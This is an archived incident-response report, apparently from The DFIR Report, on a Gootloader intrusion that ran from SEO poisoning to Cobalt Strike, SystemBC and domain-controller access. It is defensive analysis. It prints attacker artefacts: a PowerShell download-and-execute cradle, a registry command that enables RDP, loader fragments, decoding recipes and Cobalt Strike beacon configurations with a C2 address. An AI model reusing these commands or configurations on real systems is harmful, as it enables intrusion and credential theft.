{
	"id": "141d1077-64cb-4717-a248-88233407dbb8",
	"created_at": "2026-04-06T02:12:02.380274Z",
	"updated_at": "2026-04-10T13:12:24.833432Z",
	"deleted_at": null,
	"sha1_hash": "98656c9d160044911262ba48761c147e58a78340",
	"title": "SEO Poisoning to Domain Control: The Gootloader Saga Continues",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 14864761,
	"plain_text": "SEO Poisoning to Domain Control: The Gootloader Saga\r\nContinues\r\nBy editor\r\nPublished: 2024-02-26 · Archived: 2026-04-06 01:30:23 UTC\r\nKey Takeaways\r\nIn February 2023, we detected an intrusion that was initiated by a user downloading and executing a file\r\nfrom a SEO-poisoned search result, leading to a Gootloader infection.\r\nAround nine hours after the initial infection, the Gootloader malware facilitated the deployment of a Cobalt\r\nStrike beacon payload directly into the host’s registry, and then executed it in memory.\r\nThe threat actor deployed SystemBC to tunnel RDP access into the network, which aided in compromising\r\ndomain controllers, backup servers, and other key servers.\r\nThe threat actor conducted an interactive review of sensitive and confidential files using RDP; however, we\r\nhave been unable to confirm whether any data was actually exfiltrated.\r\nMore information about Gootloader can be found in the following reports: The DFIR Report, GootloaderSites,\r\nMandiant, Red Canary, \u0026 Kroll.\r\nAn audio version of this report can be found on Spotify, Apple, YouTube, Audible, \u0026 Amazon.\r\nSubmit your feedback on this report for a chance to win free swag!\r\nThe DFIR Report Services\r\nWe provide a range of services including Private Threat Briefs, which includes 25+ private reports yearly. These\r\nreports follow a format similar to our public reports but are more concise in nature and are published within weeks\r\nof the intrusion.\r\nAnother service we provide is our Threat Feed, specializing in tracking Command and Control frameworks such\r\nas Cobalt Strike, Metasploit, Sliver, and more.\r\nOur comprehensive All Intel service includes the Private Threat Briefs and Threat Feed, with additional insights\r\nsuch as private events, long-term infrastructure tracking, clustering of intrusion data, Cobalt Strike configurations,\r\nC2 domains, and more.\r\nWe also offer a Private Ruleset which consists of exclusively curated rules using insights derived from Private\r\nThreat Briefs and other internal cases. This ruleset currently encompasses 100+ Sigma rules, created from the\r\nknowledge of 40+ cases. Each rule is mapped to ATT\u0026CK and accompanied by a test example.\r\nWe invite you to reach out for a personalized demo of our services via our Contact Us page.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 1 of 54\n\nTable of Contents:\r\nCase Summary\r\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCollection\r\nCommand and Control\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nCase Summary\r\nThe intrusion started in February 2023, when a user conducted a search for “Implied Employment Agreement”.\r\nThe people behind Gootloader frequently exploit terms related to contracts and agreements for search engine-optimization (SEO) poisoning. In this instance, the user encountered a SEO poisoned result and clicked on it. This\r\naction directed them to a compromised website that mimicked a user forum. On this webpage, a deceptive link\r\nenticed the user to download what was supposed to be an employment agreement.\r\nUpon opening the received zip file, the user saw a JavaScript file bearing a name similar to their initial search\r\nterm. Clicking on this file triggered the Gootloader malware’s execution process. This led to the creation of a new\r\nJavaScript file within the user’s AppData folder. To ensure its continuous operation, Gootloader established a\r\nscheduled task to run this newly created file, incorporating a logon trigger for persistence. The sequence ends with\r\nthe execution of an obfuscated PowerShell script, which calls another PowerShell script.\r\nThis script performs some basic discovery of information about the host using built-in PowerShell Cmdlets and\r\nWMI queries. The script then reaches out to a rotating list of remote endpoints. Around nine hours after the initial\r\nexecution, one of the remote endpoints responded to the Gootloader malware, providing a download that was\r\nwritten to two registry keys. Those registry keys contained an obfuscated launcher for Gootloader and a Cobalt\r\nStrike beacon, which was loaded directly into memory.\r\nNext, an instance of process injection into dllhost was detected, accompanied by network connections to several\r\nremote hosts checking for LDAP and SMB. Additionally, LDAP network traffic directed to a domain controller\r\nwas observed, indicating discovery operations targeting various groups, including Domain Users, Administrators,\r\nRDP Users, and Domain Administrators.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 2 of 54\n\nApproximately ten minutes after these activities, the threat actor initiated lateral movement within the network.\r\nThis involved creating a remote service to disable Windows Defender’s Real-Time Monitoring. Subsequently,\r\nthey transferred a Cobalt Strike beacon executable over SMB and executed it as a service. Following this,\r\nadditional process injections and access to the LSASS memory, were observed on the compromised hosts.\r\nThe threat actor continued trying this method to move to various workstations and domain controllers. However,\r\non the domain controllers, Windows Defender remained operational and successfully thwarted the attempts to\r\nlaunch the beacons. Despite these setbacks, the attacker continued their efforts from a compromised workstation,\r\nutilizing PowerView to conduct additional discovery tasks.\r\nTo breach the domain controller, the threat actor adjusted their strategy. They introduced a new PowerShell script\r\nonto a workstation and executed it, which was a PowerShell implementation of SystemBC. This script initiated\r\ncommunication with a command and control server and established persistence by creating a registry run key.\r\nFollowing this setup, the threat actor executed multiple commands through remote services on a domain controller\r\nto ensure RDP access was enabled. They then logged into the domain controller over RDP by routing the\r\nconnection through the infected workstation using SystemBC.\r\nHaving gained access to the domain controller, the threat actor transferred a text file containing a series of\r\ncommands through their RDP session, aimed at further attempts to disable Windows Defender. Despite these\r\nefforts, their attempt to deploy a PowerShell beacon seemed to be unsuccessful. Not deterred, they proceeded to\r\ninstall Advanced IP Scanner on the domain controller and initiated a network scan. While that was running, they\r\nexplored a remote file share, during which they accessed a document containing password-related information.\r\nThe threat actor next turned their attention to a backup server, utilizing Windows Remote Management (WinRM)\r\nto execute multiple commands, ensuring that RDP access to the server was enabled and open. After ensuring RDP\r\nwas available, they connected to the server via RDP and proceeded to review the backup configurations for the\r\nenvironment. During this time, they also deployed the SystemBC PowerShell script on the server. After this\r\nactivity, there was a noticeable lull in the threat actor’s actions, with no significant activities recorded for the next\r\nfive hours. Upon returning, the threat actor resumed accessing hosts over RDP.\r\nThe threat actor resumed their search for sensitive information by looking through file shares for documents\r\npertaining to passwords, while operating from the backup server. Additionally, they executed Advanced IP\r\nScanner again, this time from the backup server. Throughout their RDP session, they interactively viewed data, yet\r\nno direct signs of data exfiltration were observed during this phase of activity. After this, the threat actor’s\r\npresence on the network ceased, and they were not detected again prior to being evicted from the network.\r\nSubmit your feedback on this report for a chance to win free swag!\r\nAnalysts\r\nAnalysis and reporting completed by @_pete_0, @malforsec \u0026 @r3nzsec\r\nInitial Access\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 3 of 54\n\nThe initial access was achieved by the user navigating to a SEO-poisoned website via Google search. Once\r\nopened the site masquerades as a forum and with a download link to an ‘Implied Employment Agreement’\r\ndocument.\r\nIn our previous analysis of Gootloader, detailed in our report, “SEO Poisoning: A Gootloader Story,” we revisit\r\nthe same initial access technique employed by threat actors. For a better understanding, we’ve included a video in\r\nour previous report that visually demonstrates the user’s journey from SEO poisoning to encountering Gootloader\r\nmalware.\r\nThe ‘Implied Employment Agreement’ turned out to be a zip archive containing the GootLoader multistage loader.\r\nWe can see from the below that the zip was downloaded from a website on the internet (ZoneId=3).\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 4 of 54\n\nBelow depicts the process of the start of the Gootloader infection:\r\nExecution\r\nGootloader employs several executions across the whole infection chain.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 5 of 54\n\nThe JavaScript file was executed after the user double-clicked on it within the opened zip archive.\r\nExecution of the Javascript file drops another Javascript file named “Frontline Management.js”. This dropped\r\nJavascript is heavily obfuscated.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 6 of 54\n\nIn addition to the file, a new scheduled task named ‘InfrSiRfucture Technologies’ was created. This task was then\r\ninvoked to run the new Javascript file. The infection chain continues with a PowerShell script. The execution\r\nchain here is Svchost.exe(Scheduled Task) ➝ Wscript.exe ➝ Cscript.exe ➝ Powershell.exe\r\nThe PowerShell script included URLs to ten remote servers:\r\nNot all the included remote servers were weaponized at the time of execution, so some servers answered with\r\nHTTP 405 “Method Not Allowed”.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 7 of 54\n\nFor the server that was weaponized, however, there is a different response. For this intrusion, that was\r\n46.28.105[.]94 with the URL “hxxp:blog[.]lilianpraskova[.]cz/xmlrpc[.]php”. The server then started answering\r\nwith the HTTP status code 200 “OK” and delivering the final stage in the Gootloader infection.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 8 of 54\n\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 9 of 54\n\nThe final download contained three different components. Gootloader stage1(prameter $cXqt) which was an\r\nobfuscated dll, Gootloader stage2(parameter $IbaY) which ended up as an exe file when deobfuscated. Finally, a\r\nscript wrote stage1 and stage2 into the registry before deobfuscating stage1 and loading that into memory. Stage1\r\ntook care of the deobfuscation of stage2, the final payload for Gootloader, and loaded what we later will see is a\r\nCobalt Strike Beacon.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 10 of 54\n\nThe encoded PowerShell command that ran is beautified and decoded below.\r\nHere’s the decoded value:\r\n609265940; sleep -s (20); 60213434; $sxd=\"hkcu:\\software\\microsoft\\Personalization\\geRBAdXTDCkN\"; $tG\r\nDecoding the JavaScript stager payload manually could be time-consuming, so we used this fantastic script made\r\nby Mandiant. This is a collection of scripts used to deobfuscate Gootloader malware samples. We used the\r\nGootLoaderAutoJSDecode.py Python script that automatically decodes .js files using static analysis.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 11 of 54\n\nPersistence\r\nGootloader\r\nA scheduled task was created during the initial Gootloader execution. This task was run on demand to execute the\r\nnext stage in the Gootloader malware chain, and setup a Logon Trigger to maintain persistence on the beachhead.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 12 of 54\n\nSystemBC\r\nLater in the intrusion the threat actor deployed a SystemBC PowerShell script. They setup persistence for this\r\nscript by using an autorun key named ‘socks_powershell’\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 13 of 54\n\nPrivilege Escalation\r\nThe use of the Cobalt Strike ‘getsystem’ command was evident, with cmd being spawned from the beacon\r\n(DLLHOST) to elevate to a ‘SYSTEM’ context.\r\nDetails of the technique are documented here: https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem\r\nThroughout the intrusion, new logon sessions were initiated using tokens created from harvested credentials.\r\nInitially, a sacrificial process, dllhost.exe, was launched from the PowerShell payload using the credentials of the\r\ncompromised beachhead account.\r\nUsing a harvested credential, a new logon session was created. This was logged under Windows eventID 4624,\r\nshowing the initial Logon ID, and followed the new Logon ID using the target user account.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 14 of 54\n\nThe newly created logon session (Logon ID) was assigned special privileges (elevated) as detailed in eventID\r\n4672.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 15 of 54\n\nResulting in the CMD with the new logon session with elevated privileges\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 16 of 54\n\nThe threat actor targeted several accounts using the same technique, these were:\r\nThe threat actor pivoted across compromised accounts and across several endpoints with relative ease.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 17 of 54\n\nMultiple detection opportunities exist, including correlating atypical logons to high-privilege accounts from\r\nunexpected accounts or workstations, and the assignment of special privileges to a logon ID by standard users.\r\nThe use of ‘Logon type 9’ alongside an authentication type of ‘seclogo’ strongly indicates credential use, akin to\r\nthe ‘runas’ command’s /netonly method, as used by Cobalt Strike’s ‘pass the hash’ technique.\r\n(https://www.cobaltstrike.com/blog/windows-access-tokens-and-alternate-credentials).\r\nDefense Evasion\r\nOn the beachhead host, to avoid dropping files to disk, several registry keys were created to store the payloads\r\nunder:\r\nHCKU\\Software\\Microsoft\\Personalization\r\nEach key has an associated payload (stage 1 and 2). These keys stored the data for the Cobalt Strike beacon\r\nexecuted on the beachhead.\r\ngeRBAdXTDCkN\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 18 of 54\n\ncbkSBtbjQBNFy\r\nExecution of the payload to run the Cobalt Strike beacon can be observed by base64 encoded PowerShell\r\ncommands\r\nDuring the intrusion we observed activity related to Windows Defender tampering. This command was executed\r\nremotely on the hosts using Cobalt Strike modules such as psexec_psh. Scheduled scanning tasks were deleted,\r\nand a service was created to disable real-time monitoring.\r\nScheduled task commands\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 19 of 54\n\nRemote Desktop\r\nRestricted Admin Mode was enabled by modifying the DisableRestrictedAdmin key to 0\r\nEnabling Restricted Admin Mode allows the attacker to use collected hashes to login instead of a password. An\r\nexplanation can be found here [https://github.com/GhostPack/RestrictedAdmin]. The same technique was\r\nobserved by SVR and various other threat actors.\r\nThe same technique was also observed in a previous Gootloader case as well as two other public cases.\r\nThe second registry modification allowed RDP connections by changing the ‘DenyTSConnections’ setting.\r\nWindows Firewall\r\nOn the domain controller, ‘Netsh’ was used to enable the remote desktop firewall profile\r\nfollowed by the remote admin firewall profile\r\nProcess Injection\r\nWe observed process injection activity, with PowerShell and dllhost being utilized to load Cobalt Strike beacons\r\ninto the memory on the beachhead host.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 20 of 54\n\nThis can be observed in the memory dump from the beachhead host with the tell-tale\r\nPAGE_EXECUTE_READWRITE protection settings on the memory space and MZ headers observable in the\r\nprocess memory space.\r\nDuring the intrusion, we observed multiple named pipes utilized by the threat actor’s Cobalt Strike injected\r\nbeacons via PowerShell and dllhost:\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 21 of 54\n\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 22 of 54\n\nPipeName: \\4fcc39\r\nPipeName: \\netsvc\\1324\r\nPipeName: \\4fcc39\r\nPipeName: \\netsvc\\415\r\nCredential Access\r\nAcross the compromised endpoints where a Cobalt Strike beacon was deployed, the LSASS process was accessed\r\nto retrieve in memory credentials.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 23 of 54\n\nSuspicious CallTrace with ‘UNKNOWN’ indicates injected code, whilst the Granted Access 0x1010 is a standard\r\nbehavior from credential stealing tools such as mimikatz. The code 0x1010 can be broken down to the below\r\naccess rights:\r\n0x00000010 = VMRead\r\n0x00001000 = QueryLimitedInfo\r\nThe operator spent some time accessing and viewing files. File that were of the most interest were those that could\r\nindicate credentials storage. In this intrusion ‘Notepad’ was used to view a file within a Passwords file share\r\nlocation.\r\nDiscovery\r\nGootloader\r\nBefore hands on keyboard activity, Gootloader ran a number of PowerShell Cmdlets to collect basic host\r\ninformation.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 24 of 54\n\nThe first section collected environmental data from the host using env:\r\nNext the host operating system using Get-WmiObject:\r\nFollowed by running processes with a filter for maintitlewindow using Get-Process.\r\nNo filter:\r\nWith filter:\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 25 of 54\n\nAnd a disk space check using Get-PsDrive:\r\nRDP Port Discovery\r\nAdvanced IP Scanner (https://www.advanced-ip-scanner.com/) was executed from a compromised account and\r\nthen used to look for systems with RDP (3389) open.\r\nLDAP\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 26 of 54\n\nThe DLLHost process (Cobalt Strike beacon) undertook several LDAP (Lightweight Directory Access Protocol)\r\nqueries using port 389 and 3268. \r\nShares Enumeration\r\nScanning all the network endpoints for the presence of shared folders was undertaken. This is a common\r\ntechnique we’ve observed in other similar cases to discover and collect information of interest, i.e., credentials and\r\nconfidential information.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 27 of 54\n\nPing\r\nThe DLLHost (Cobalt Strike beacon) conducted several ping sweeps across endpoints using the ‘ping’ command:\r\nThe use of the ping command had several unusual indicators. The command was executed from a SYSTEM\r\naccount, and a conhost process was created with no attached console session [https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-wtsgetactiveconsolesessionid#return-value]\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 28 of 54\n\nMultiple executions of ‘ping’ using these indicators:\r\nAD Groups\r\nThe threat actor enumerated the “Remote Management Users”, “Remote Desktop Users”, “Local Administrators”\r\nand “Distributed COM Users” groups.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 29 of 54\n\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 30 of 54\n\nPowerSploit\r\nPowerView Cmdlets as part of PowerSploit were observed being used to discover the domain configuration.\r\nObserved Cmdlets included Get-DomainFileServer and Get-DomainSearcher. This was passed as a base64\r\nencoded value, from a user context of SYSTEM. The Base64 value SQB is a common indicator of the IEX\r\nkeyword, often used for downloading of files.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 31 of 54\n\nThe command:\r\nDecoded as:\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:12210/'); Get-DomainFileServer\r\nThe use of a loop back IP address [127.0.0.1] indicated that the script was delivered through its own implant\r\n[dllhost]. Details of the command use here.\r\nInvocation of Get-DomainSearcher function as a part of the Get-DomainFileServer execution:\r\nLateral Movement\r\nCobalt Strike beacons were deployed across several endpoints using remote service creation. Services were either\r\ncreated based on Powershell base64 encoded payloads or as a dropper executable.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 32 of 54\n\nCobalt Strike beacon PowerShell payloads have recognizable indicators, including random service name, use of\r\nCOMPSPEC, and PowerShell parameters. The Base64 encoding starting with JAB is a common indicator of\r\nvariables being used.\r\nCompiled Cobalt Strike beacons were dropped onto Domain Controllers\r\nThis particular beacon was detected by the host AV [Windows Defender eventID 1117] and removed.\r\nCobalt Strike beacons distributed with SMB admin shares\r\nThe diagram below shows the distribution of Cobalt Strike beacons to hosts in the environment over SMB admin\r\nshares.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 33 of 54\n\nWMI used to start remote process\r\nIn this intrusion, the “reg add” command was executed remotely through WMI to attempt to permit RDP\r\nconnections by changing the “DenyTSConnections” key to false (0), as shown with the network traffic capture\r\nbelow.\r\nreg add \"HKLM\\SYSTEM\\CurrrentControlSet\\Control\\Terminal Server\" /f /v fDenyTSConnections /t REG_DWOR\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 34 of 54\n\nThe threat actor again executed a command to modify the registry key to enable Restricted Admin mode remotely\r\nvia WMI. This activity was captured via Windows eventID 4688.\r\nRemote Desktop Protocol\r\nRDP was used to move laterally between several hosts. The diagram below shows the RDP connections made by\r\nthe threat actor.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 35 of 54\n\nWindows eventlog for RDP “RemoteDesktopServices-RdpCoreTS/Operational” eventID 131 shows RDP activity\r\nwith details like client IP and source port.\r\nRemote Service creation with MSRPC\r\nThe threat actor utilized RPC to create services remotely. Using MSRPC Service Control Manager(SCM) is a\r\nknown Cobalt Strike feature to execute code on remote hosts. Here the CreateWowService call is used to run\r\nPowerShell command to disable Windows Defender Real Time Monitoring. Adding the password or NTLM hash\r\nin wireshark will decrypt the traffic.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 36 of 54\n\nHands On Keyboard\r\nUsing a compromised account, the threat actor was observed moving payloads between hosts using Notepad. The\r\nfile they dropped the content into was aptly named ‘payload.txt’.\r\nThe file payload.txt was captured on network share before the threat actor dropped the content into a text file with\r\nNotepad. The data contained both an encoded PowerShell command and several commands to disable\r\nfunctionality in windows defender.\r\nWe can see the threat actor then copied the data from Sysmon eventID 24, which also shows the threat actor\r\nhostname as DESKTOP-GRALDC5.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 37 of 54\n\nCollection\r\nBesides password related documents mentioned in credential access other sensitive files were accessed using\r\nWordPad. Some files of interest were legal-related files and folders such as Contracts.\r\nCommand and Control\r\nCobalt Strike\r\nThe Cobalt Strike server used for this intrusion has been tracked in the DFIR Report threat intelligence feed\r\nbefore the incident occured.\r\n91.215.85.143:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3S: f176ba63b4d68e576b5ba345bec2c7b7\r\nCS Stager\r\nDuring the intrusion, we also observed the malicious PowerShell execution that contains base64 strings from the\r\ndomain controller.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 38 of 54\n\nAfter decoding the base64 strings using CyberChef, the output generated looks cleaner. However, we also noticed\r\nthe second layer of the obfuscation on the output below.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 39 of 54\n\nAfter initial Base64 decoding, we found the payload used the default Cobalt Strike XOR value of 35, allowing for\r\nthe next step of decoding the payload based on the output below.\r\nAfter decoding the second layer of obfuscation using the XOR key of 35, we have the next layer of base64 strings.\r\nWe can use the XOR key 35 to decode this again. We can use the below CyberChef recipe as our next step. \r\nRegular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List match\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nGunzip()\r\nLabel('Decode')\r\nRegular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List match\r\nConditional_Jump('',false,'',10)\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nXOR({'option':'Decimal','string':'35'},'Standard',false)\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 40 of 54\n\nThe data can be saved and parsed using the 1768.py tool from Didier Stevens that reveals the Cobalt Strike stager\r\nconfiguration, including the C2 IP (91.215.85[.]143) and the license-ID (watermark) (206546002), which is a\r\nwell-known watermark used in multiple attacks based on our previous published reports.\r\nThe beachhead host using a Cobalt Strike beacon, injected into PowerShell and DLLHost processes; these served\r\nas the main ingress and egress command and control channel to 91.215.85[.]143:443\r\nCS HTTP Beacon\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 41 of 54\n\nThe threat actor used Cobalt Strike HTTP Beacons for command and control communication. Three separate hosts\r\nwere infected with a Cobalt Strike HTTP beacon communicating to IPv4 91.215.85[.]143:443.\r\nCobalt Strike HTTP Beacon configuration:\r\n{\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"sleeptime\": 22000,\r\n \"jitter\": 37,\r\n \"maxgetsize\": 13986556,\r\n \"spawnto\": \"WzJAyjDIW7WfbjhHiN8wmQ==\",\r\n \"license_id\": 206546002,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"91.215.85.143\",\r\n \"port\": 443,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN5UAJbAA83lOuZlkNoqHDAdV1F7OJnqUiF3kD6mwuXzJ\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/jquery-3.3.1.min.js\",\r\n \"verb\": \"GET\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\n \"append 1522 characters\",\r\n \"prepend 84 characters\",\r\n \"prepend 3931 characters\",\r\n \"base64url\",\r\n \"mask\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/jquery-3.3.2.min.js\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 42 of 54\n\n\"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"NtMapViewOfSection\",\r\n \"execute\": [\r\n \"CreateThread 'ntdll!RtlUserThreadStart'\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 17500,\r\n \"startrwx\": false,\r\n \"stub\": \"yl5rgAigihmtjA5iEHURzg==\",\r\n \"transform-x86\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"transform-x64\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"userwx\": false\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 43 of 54\n\n},\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nCobalt Strike SMB Beacon\r\nThe threat actor also used Cobalt Strike SMB beacons to chain beacons together for lateral movement. We\r\nobserved four hosts where Cobalt Strike SMB beacons were used.\r\nCobalt Strike SMB beacon configuration:\r\n{\r\n \"beacontype\": [\r\n \"SMB\"\r\n ],\r\n \"sleeptime\": 10000,\r\n \"jitter\": 0,\r\n \"maxgetsize\": 10485760,\r\n \"spawnto\": \"WzJAyjDIW7WfbjhHiN8wmQ==\",\r\n \"license_id\": 206546002,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"\",\r\n \"port\": 4444,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN5UAJbAA83lOuZlkNoqHDAdV1F7OJnqUiF3kD6mwuXzJ\r\n },\r\n \"host_header\": null,\r\n \"useragent_header\": \"\",\r\n \"http-get\": {\r\n \"uri\": null,\r\n \"verb\": null,\r\n \"client\": {\r\n \"headers\": [],\r\n \"metadata\": null\r\n },\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 44 of 54\n\n\"server\": {\r\n \"output\": []\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"\",\r\n \"verb\": null,\r\n \"client\": {\r\n \"headers\": [],\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": null\r\n },\r\n \"http_post_chunk\": null,\r\n \"uses_cookies\": null,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"NtMapViewOfSection\",\r\n \"execute\": [\r\n \"CreateThread 'ntdll!RtlUserThreadStart'\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n 